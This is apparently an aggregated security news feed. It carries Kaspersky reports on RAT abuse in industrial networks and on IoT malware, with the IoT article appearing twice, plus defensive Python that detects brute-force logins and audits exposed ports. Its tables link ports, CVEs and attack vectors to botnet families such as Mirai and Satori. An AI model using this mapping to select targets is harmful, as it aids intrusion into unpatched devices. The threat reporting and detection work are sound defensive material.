A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necurs family, which in turn have often been used to infect computers with ransomware from the Locky family.

Conclusion

Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

  • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
  • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
  • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.
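Detection logic for two of the risks described above, as an added example that is not part of the Kaspersky Lab ICS CERT report: brute-force attempts against a RAT's server part (the most common scenario), a successful login from the same source afterwards (the compromised-credentials case), and remote control sessions outside an approved, time-limited window (the "disabled by default, enabled only upon request" rule). The log format, IP addresses, user names and approved windows are constructed for the example; real RAT products log differently, so the parser is the part to adapt.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in an invented format:
# "<timestamp> <event> src=<ip> user=<name>"
SAMPLE_LOG = """\
2018-03-12 02:14:01 AUTH_FAIL src=203.0.113.7 user=admin
2018-03-12 02:14:03 AUTH_FAIL src=203.0.113.7 user=admin
2018-03-12 02:14:06 AUTH_FAIL src=203.0.113.7 user=operator
2018-03-12 02:14:09 AUTH_FAIL src=203.0.113.7 user=root
2018-03-12 02:14:12 AUTH_FAIL src=203.0.113.7 user=admin
2018-03-12 02:14:20 AUTH_OK src=203.0.113.7 user=admin
2018-03-12 02:14:21 SESSION_START src=203.0.113.7 user=admin
2018-03-12 10:02:00 AUTH_OK src=192.0.2.15 user=integrator
2018-03-12 10:02:01 SESSION_START src=192.0.2.15 user=integrator
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<event>\w+) "
    r"src=(?P<src>\S+) user=(?P<user>\S+)$"
)

# Hypothetical approved access windows: (user, start, end). Anything not
# covered here is a session nobody requested.
APPROVED_WINDOWS = [
    ("integrator", datetime(2018, 3, 12, 9, 0), datetime(2018, 3, 12, 12, 0)),
]


def parse_log(text):
    """Parse the constructed log format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
            events.append(d)
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Sources with >= threshold AUTH_FAIL events inside a sliding window.

    Returns {source: time the threshold was first crossed}."""
    recent = defaultdict(deque)
    flagged = {}
    for e in events:
        if e["event"] != "AUTH_FAIL":
            continue
        q = recent[e["src"]]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and e["src"] not in flagged:
            flagged[e["src"]] = e["ts"]
    return flagged


def detect_success_after_bruteforce(events, flagged):
    """A successful login from a source already flagged for brute force:
    treat the credentials as compromised, not the login as legitimate."""
    hits = set()
    for e in events:
        if (e["event"] == "AUTH_OK" and e["src"] in flagged
                and e["ts"] >= flagged[e["src"]]):
            hits.add(e["src"])
    return sorted(hits)


def detect_unapproved_sessions(events, approved):
    """SESSION_START events whose user/time are outside every approved window."""
    unapproved = []
    for e in events:
        if e["event"] != "SESSION_START":
            continue
        ok = any(u == e["user"] and start <= e["ts"] <= end
                 for u, start, end in approved)
        if not ok:
            unapproved.append((e["ts"].isoformat(), e["src"], e["user"]))
    return unapproved


def audit(text, approved=APPROVED_WINDOWS):
    """Run all three checks over one log and return the findings."""
    events = parse_log(text)
    flagged = detect_bruteforce(events)
    return {
        "bruteforce_sources": sorted(flagged),
        "credential_compromise_suspected": detect_success_after_bruteforce(events, flagged),
        "unapproved_sessions": detect_unapproved_sessions(events, approved),
    }


if __name__ == "__main__":
    for name, finding in audit(SAMPLE_LOG).items():
        print(f"{name}: {finding}")
```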


Securelist - Kaspersky Lab’s cyberthreat research and reports

11M Records of E-Marketing Data Exposed Online From Unsecured MongoDB Instance

It has only been a week since we heard of the massive Veeam data leakage from misconfigured MongoDB server incident. The

11M Records of E-Marketing Data Exposed Online From Unsecured MongoDB Instance on Latest Hacking News.

SecurityWeek RSS Feed: Click2Gov Attacks on U.S. Cities Attributed to Previously Unknown Group

A previously unknown financially motivated threat group is believed to be behind a series of attacks whose goal was to obtain payment card data from U.S. cities relying on Click2Gov software for utility bill payments.




SecurityWeek RSS Feed

When It Comes to Cloud Data Protection, Defend Your Information Like a Guard Dog


These days, enterprises are increasingly running their business from the cloud. But the portion of your business that’s running in this environment presents numerous security challenges. When it comes to cloud data protection, it’s not just credit card numbers and personally identifiable information (PII) that need protecting, but also the data that represents the majority of your company’s value: your intellectual property. This includes your product designs, marketing strategy, financial plans and more. To add to the complexity, much of that data is stored in disparate repositories.

How do you know if you’re doing enough to protect the cloud-stored data that’s most crucial to your business? To keep malicious actors away from your cloud-bound crown jewels, you need the cybersecurity equivalent of a guard dog — one that knows when to bark, when to bite and when to grant access to those within its circle of trust.

Let’s take a closer look at some challenges related to protecting data in the cloud and outline key considerations when selecting a cloud security provider.

What to Do When Data Is Out of Your Hands

Data that’s stored in the cloud is inherently accessible to other people, including cloud service providers, via numerous endpoints, such as mobile devices and social media applications. You can no longer protect your sensitive data by simply locking down network access.

You need security against outside threats, but you also need it on the inside, all the way down to where the data resides. To address this, look for a provider that offers strong data encryption and data activity monitoring, inside and out.

Data Is Here, There and Everywhere

With the growth of mobile and cloud storage, data is here, there, in the cloud, on premises, and everywhere in between. Some of it is even likely stored in locations you don’t know about. Not only does everyone want access to data, they expect access to it at the click of a mouse. A complete cloud data protection solution should have the following:

  • Mature, proven analytical tools that can analyze your environment to automatically discover data sources, analyze those data sources to discover the critical, sensitive, regulated data, and intelligently and automatically uncover risks and suspicious behavior.
  • Protection with monitoring across all activity, both network and local, especially the actions of privileged users with access to your most sensitive data. Of course, you should also protect data with strong encryption.
  • Adaptability to your changing and expanding environment, with a security solution that can support hybrid environments and seamlessly adjust to alterations in your IT landscape.

How to Gain Visibility Into Risks and Vulnerabilities

Detecting risks of both internal and external attacks is more challenging as data repositories become more virtualized. Common vulnerabilities include missing patches, misconfigurations and exploitable default system settings.

Best practices suggest authorizing both privileged and ordinary end users according to the principle of least privilege to minimize abuse and errors. A robust cloud data protection solution can help secure your cloud and hybrid cloud infrastructure with monitoring and assessment tools that reveal anomalies and vulnerabilities.

Choose the Right Data-Centric Methodology

A data-centric methodology should go hand in hand with the solutions outlined above to support cloud data protection. Make sure your data security solution can do the following:

  • Automatically and continuously discover data sources that you may not have realized existed. This means classifying the data in those databases to understand where you have sensitive, regulated and high-risk data.
  • Harden data sources and data. For data sources, that means understanding what vulnerabilities exist and who has access to data based on entitlement reports. For hardening data, your solution should enable you to set policies around who has access and when access needs to be blocked, quarantined or possibly allowed but masked before granting access.
  • Monitor all users, especially privileged users, to be able to prove to auditors that they are not jeopardizing the integrity of your data.
  • Proactively protect with blocking, quarantining and masking, as well as threat analytics that cover all data sources and use machine learning. Threat analytics can help you understand which activities represent normal, everyday business and which are suspect or anomalous — information that humans can’t possibly uncover on a large scale.

Find a Guard Dog for Your Cloud Data Protection

If your organization is just starting out with data protection, consider a software-as-a-service (SaaS) risk analysis solution that can enable you to quickly get started on the first two steps outlined above. By starting with a solution that supports discovery, classification and vulnerability assessments of both on-premises and cloud-based data sources, you can make demonstrable progress with minimal time and technology investment. Once you have that baseline, you can then start investigating more comprehensive data activity monitoring, protection and encryption technologies for your cloud-bound data.

The post When It Comes to Cloud Data Protection, Defend Your Information Like a Guard Dog appeared first on Security Intelligence.

Kaspersky: Attacks on Smart Devices Rise Threefold in 2018

Attacks against smart devices are surging, with both old and new threats targeting connected devices that remain largely unsecured, according to researchers at Kaspersky Lab. Kaspersky researchers observed three times as many malware samples against smart devices in the first half of 2018 than they did in all of 2017, according to new findings...



Peekaboo Zero-Day Vulnerability Allows Hacking of Surveillance Cameras

IoT-based security cameras from various vendors invite opportunities for flaws. Recently, researchers have discovered a similar vulnerability that allows hacking

Peekaboo Zero-Day Vulnerability Allows Hacking of Surveillance Cameras on Latest Hacking News.

Facebook Bug Bounty Program Expands To Include Third-Party Apps

In the post-Cambridge Analytica phase, Facebook appears to have worked extensively towards user data privacy. Although, even after the Cambridge Analytica

Facebook Bug Bounty Program Expands To Include Third-Party Apps on Latest Hacking News.

Securelist – Kaspersky Lab’s cyberthreat research and reports: New trends in the world of IoT threats

Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.

[Figure] Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.

One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots as all other types combined.

Service | % of attacks
Telnet | 75.40%
SSH | 11.59%
Other | 13.01%

When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

# | Downloaded malware | % of attacks
1 | Backdoor.Linux.Mirai.c | 15.97%
2 | Trojan-Downloader.Linux.Hajime.a | 5.89%
3 | Trojan-Downloader.Linux.NyaDrop.b | 3.34%
4 | Backdoor.Linux.Mirai.b | 2.72%
5 | Backdoor.Linux.Mirai.ba | 1.94%
6 | Trojan-Downloader.Shell.Agent.p | 0.38%
7 | Trojan-Downloader.Shell.Agent.as | 0.27%
8 | Backdoor.Linux.Mirai.n | 0.27%
9 | Backdoor.Linux.Gafgyt.ba | 0.24%
10 | Backdoor.Linux.Gafgyt.af | 0.20%

Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack

And here are the Top 10 countries from which our traps were hit by Telnet password attacks:

[Figure] Geographical distribution of the number of infected devices, Q2 2018.

As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.

Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

Advantages of this distribution method over password cracking:

  • Infection occurs much faster
  • It is much harder to patch a software vulnerability than change a password or disable/block the service

Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

New attacks, old malware

To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

Service | Port | % of attacks | Attack vector | Malware families
Telnet | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt
SSH | 22 | 11.51% | Bruteforce | Mirai, Gafgyt
Samba | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | -
TR-069 | 7547 | 0.77% | RCE in TR-069 implementation | Mirai, Hajime
HTTP | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | -
WinBox (RouterOS) | 8291 | 0.71% | Used for RouterOS (MikroTik) authentication and WinBox-based attacks | Hajime
MikroTik HTTP | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 (Chimay-Red) | Hajime
MSSQL | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | -
GoAhead httpd | 81 | 0.16% | RCE in GoAhead IP cameras | Persirai, Gafgyt
MikroTik HTTP | 8081 | 0.15% | Chimay-Red | Hajime
Ethereum JSON-RPC | 8545 | 0.15% | Authorization bypass (CVE-2017-12113) | -
RDP | 3389 | 0.12% | Bruteforce | -
XiongMai uc-httpd | 8000 | 0.09% | Buffer overflow (CVE-2018-10088) in XiongMai uc-httpd 1.0.0 (some Chinese-made devices) | Satori
MySQL | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | -

The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.

Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

Device | % of infected devices
MikroTik | 37.23%
TP-Link | 9.07%
SonicWall | 3.74%
AV tech | 3.17%
Vigor | 3.15%
Ubiquiti | 2.80%
D-Link | 2.49%
Cisco | 1.40%
AirTies | 1.25%
Cyberoam | 1.13%
HikVision | 1.11%
ZTE | 0.88%
Miele | 0.68%
Unknown DVR | 31.91%

As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

Port 7547

Attacks against remote device management (TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that’s despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.

Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.

IP cameras

IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.

On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XiongMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

New malware and threats to end users

DDoS attacks

As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often be “cured” with a simple reboot.

Cryptocurrency mining

Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

  • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
    • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
    • CVE-2017-17215 – RCE in the firmware of Huawei HG532 routers
    • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
    • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
  • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Ethereum miner remote management tool, they substitute the wallet address for their own.

Data theft

The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

  • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject JavaScript code into intercepted web pages.
  • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
  • Uses Tor for communication with C&C.
  • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.

The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.

The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

  • ASUS
  • D-Link
  • Huawei
  • Linksys
  • MikroTik
  • Netgear
  • QNAP
  • TP-Link
  • Ubiquiti
  • Upvel
  • ZTE

The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.

Conclusion

Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

Here are some simple tips to help minimize the risk of smart device infection:

  • Don’t give access to the device from an external network unless absolutely necessary
  • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
  • Regularly check for new firmware versions and update the device
  • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
  • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
  • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.
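An added example (not from the Securelist article) that turns the attacked-ports table above and the "close unused ports, don't expose the device externally" tips into a check you can run against a device: it parses `ss -ltn`-style listener output, keeps only sockets reachable from the network, and flags any listener on a port from the article's table that is not on your allow-list, plus allowed services bound to all interfaces rather than the LAN. The listener output, the allow-list and the port-to-service map are constructed for the example.

```python
import ipaddress
import re

# Ports from the article's Q2 2018 table of attacked services (names abbreviated).
ATTACKED_PORTS = {
    23: "Telnet", 2323: "Telnet", 22: "SSH", 445: "SMB/Samba", 7547: "TR-069",
    80: "HTTP", 8291: "WinBox (RouterOS)", 8080: "MikroTik HTTP", 1433: "MSSQL",
    81: "GoAhead httpd", 8081: "MikroTik HTTP", 8545: "Ethereum JSON-RPC",
    3389: "RDP", 8000: "XiongMai uc-httpd", 3306: "MySQL",
}

# Constructed `ss -ltn` output for a hypothetical home router.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:23           0.0.0.0:*
LISTEN  0       128     127.0.0.1:8080       0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
LISTEN  0       128     192.168.1.1:80       0.0.0.0:*
LISTEN  0       128     0.0.0.0:7547         0.0.0.0:*
LISTEN  0       128     0.0.0.0:53           0.0.0.0:*
"""

# "Local Address:Port" followed by the wildcard peer column; works for both
# ss and netstat layouts since it searches rather than anchors.
ROW_RE = re.compile(r"(?P<addr>\[[0-9a-fA-F:]*\]|[0-9.]+|\*):(?P<port>\d+)\s+\S+:\*")


def parse_listeners(text):
    """Return [(addr, port)] for LISTEN rows; headers and non-matching lines skip."""
    out = []
    for line in text.splitlines():
        if "LISTEN" not in line:
            continue
        m = ROW_RE.search(line)
        if m:
            out.append((m.group("addr"), int(m.group("port"))))
    return out


def classify(addr):
    """Who can reach a socket bound to this address."""
    if addr == "*":
        return "all-interfaces"
    ip = ipaddress.ip_address(addr.strip("[]"))
    if ip.is_loopback:
        return "loopback"
    if ip.is_unspecified:       # 0.0.0.0 / :: -> every interface, WAN included
        return "all-interfaces"
    if ip.is_private:           # bound to a LAN address only
        return "lan"
    return "public"


def audit_listeners(text, needed_ports):
    """Apply the article's recommendations to the parsed listeners.

    close:           attacked port that the owner does not need
    restrict-to-lan: needed service reachable from every interface (external
                     access should not be given unless absolutely necessary)
    Ports absent from the table (e.g. DNS on 53) are not judged here."""
    findings = []
    for addr, port in parse_listeners(text):
        scope = classify(addr)
        if scope == "loopback" or port not in ATTACKED_PORTS:
            continue
        if port not in needed_ports:
            action = "close"
        elif scope in ("all-interfaces", "public"):
            action = "restrict-to-lan"
        else:
            continue
        findings.append({"port": port, "service": ATTACKED_PORTS[port],
                         "bound_to": addr, "scope": scope, "action": action})
    return sorted(findings, key=lambda f: f["port"])


if __name__ == "__main__":
    for f in audit_listeners(SAMPLE_SS, needed_ports={22, 80}):
        print(f"{f['action']:16} port {f['port']:<5} {f['service']} ({f['bound_to']})")
```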


Securelist - Kaspersky Lab’s cyberthreat research and reports

New trends in the world of IoT threats

Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.

Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018. (download)

One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots than all other types combined.

service % of attacks
Telnet 75.40%
SSH 11.59%
other 13.01%

When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

# downloaded malware % of attacks
1 Backdoor.Linux.Mirai.c 15.97%
2 Trojan-Downloader.Linux.Hajime.a 5.89%
3 Trojan-Downloader.Linux.NyaDrop.b 3.34%
4 Backdoor.Linux.Mirai.b 2.72%
5 Backdoor.Linux.Mirai.ba 1.94%
6 Trojan-Downloader.Shell.Agent.p 0.38%
7 Trojan-Downloader.Shell.Agent.as 0.27%
8 Backdoor.Linux.Mirai.n 0.27%
9 Backdoor.Linux.Gafgyt.ba 0.24%
10 Backdoor.Linux.Gafgyt.af 0.20%

Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack

And here are the Top 10 countries from which our traps were hit by Telnet password attacks:

Geographical distribution of the number of infected devices, Q2 2018. (download)

As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.

Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

Advantages of this distribution method over password cracking:

  • Infection occurs much faster
  • It is much harder to patch a software vulnerability than change a password or disable/block the service

Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

New attacks, old malware

To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

Service           | Port     | % of attacks | Attack vector                                                                                                | Malware families
Telnet            | 23, 2323 | 82.26%       | Bruteforce                                                                                                   | Mirai, Gafgyt
SSH               | 22       | 11.51%       | Bruteforce                                                                                                   | Mirai, Gafgyt
Samba             | 445      | 2.78%        | EternalBlue, EternalRed, CVE-2018-7445                                                                       | –
tr-069            | 7547     | 0.77%        | RCE in TR-069 implementation                                                                                 | Mirai, Hajime
HTTP              | 80       | 0.76%        | Attempts to exploit vulnerabilities in a web server or crack an admin console password                       | –
winbox (RouterOS) | 8291     | 0.71%        | Used for RouterOS (MikroTik) authentication and WinBox-based attacks                                         | Hajime
Mikrotik http     | 8080     | 0.23%        | RCE in MikroTik RouterOS < 6.38.5 (Chimay-Red)                                                               | Hajime
MSSQL             | 1433     | 0.21%        | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | –
GoAhead httpd     | 81       | 0.16%        | RCE in GoAhead IP cameras                                                                                    | Persirai, Gafgyt
Mikrotik http     | 8081     | 0.15%        | Chimay-Red                                                                                                   | Hajime
Ethereum JSON-RPC | 8545     | 0.15%        | Authorization bypass (CVE-2017-12113)                                                                        | –
RDP               | 3389     | 0.12%        | Bruteforce                                                                                                   | –
XiongMai uc-httpd | 8000     | 0.09%        | Buffer overflow (CVE-2018-10088) in XiongMai uc-httpd 1.0.0 (some Chinese-made devices)                     | Satori
MySQL             | 3306     | 0.08%        | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | –

The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.
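The figures quoted at the start of this section (attacks and unique source IPs per country) and the per-port breakdown in the table above both come from aggregating honeypot connection attempts by destination port and source address. The Python below is an added example of that aggregation, not Kaspersky’s honeypot code: it assumes a constructed, simplified log format (timestamp, source IP, destination port, one attempt per line) and reuses the port-to-service mapping from the table so that the output has the same shape as the report’s table.

```python
import re
from collections import Counter, defaultdict

# Constructed sample honeypot log (not data from the report). Format assumed here:
# "<timestamp> <source IP> <destination port>", one connection attempt per line.
# The last line is deliberately malformed to show that it is skipped.
SAMPLE_LOG = """\
2018-06-01T00:00:01Z 203.0.113.10 23
2018-06-01T00:00:02Z 203.0.113.10 23
2018-06-01T00:00:03Z 198.51.100.7 2323
2018-06-01T00:00:04Z 198.51.100.7 22
2018-06-01T00:00:05Z 192.0.2.44 445
2018-06-01T00:00:06Z 192.0.2.44 7547
2018-06-01T00:00:07Z 203.0.113.10 8291
2018-06-01T00:00:08Z 198.51.100.9 8080
2018-06-01T00:00:09Z 198.51.100.9 81
2018-06-01T00:00:10Z 192.0.2.45 9999
this line is garbage and must be ignored
"""

# Port-to-service mapping taken from the report's Q2 2018 table.
PORT_SERVICE = {
    23: "Telnet", 2323: "Telnet", 22: "SSH", 445: "Samba", 7547: "tr-069",
    80: "HTTP", 8291: "winbox (RouterOS)", 8080: "Mikrotik http", 1433: "MSSQL",
    81: "GoAhead httpd", 8081: "Mikrotik http", 8545: "Ethereum JSON-RPC",
    3389: "RDP", 8000: "XiongMai uc-httpd", 3306: "MySQL",
}

LINE_RE = re.compile(r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)$")


def parse_log(text):
    """Yield (timestamp, src_ip, dst_port) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), m.group(2), int(m.group(3))


def service_breakdown(text):
    """Return {service: share of attempts in %}, most common first, like the report's table.
    Ports with no mapping are grouped under 'other' so they are not silently dropped."""
    counts = Counter()
    for _, _, port in parse_log(text):
        counts[PORT_SERVICE.get(port, "other")] += 1
    total = sum(counts.values())
    if total == 0:
        return {}
    return {svc: round(100.0 * n / total, 2) for svc, n in counts.most_common()}


def unique_sources(text):
    """Number of unique attacking IPs, the quantity the report reports per country."""
    return len({ip for _, ip, _ in parse_log(text)})


def sources_per_service(text):
    """Map each service to the set of IPs that touched it; one IP hitting many services
    is a quick way to spot a scanner rather than a single-protocol bruteforcer."""
    out = defaultdict(set)
    for _, ip, port in parse_log(text):
        out[PORT_SERVICE.get(port, "other")].add(ip)
    return dict(out)


if __name__ == "__main__":
    for svc, share in service_breakdown(SAMPLE_LOG).items():
        print(f"{svc:<20} {share:6.2f}%")
    print("unique source IPs:", unique_sources(SAMPLE_LOG))
```

On the constructed sample this yields Telnet at 30% with every other mapped service at 10%, and five unique source IPs. Feeding it a real honeypot export only requires adapting `LINE_RE` to the logger’s line format; the percentage column should be read with the same caveat as the report’s, namely that it counts connection attempts, not distinct attackers.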

Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

Device      | % of infected devices
MikroTik    | 37.23%
TP-Link     | 9.07%
SonicWall   | 3.74%
AV tech     | 3.17%
Vigor       | 3.15%
Ubiquiti    | 2.80%
D-Link      | 2.49%
Cisco       | 1.40%
AirTies     | 1.25%
Cyberoam    | 1.13%
HikVision   | 1.11%
ZTE         | 0.88%
Miele       | 0.68%
Unknown DVR | 31.91%

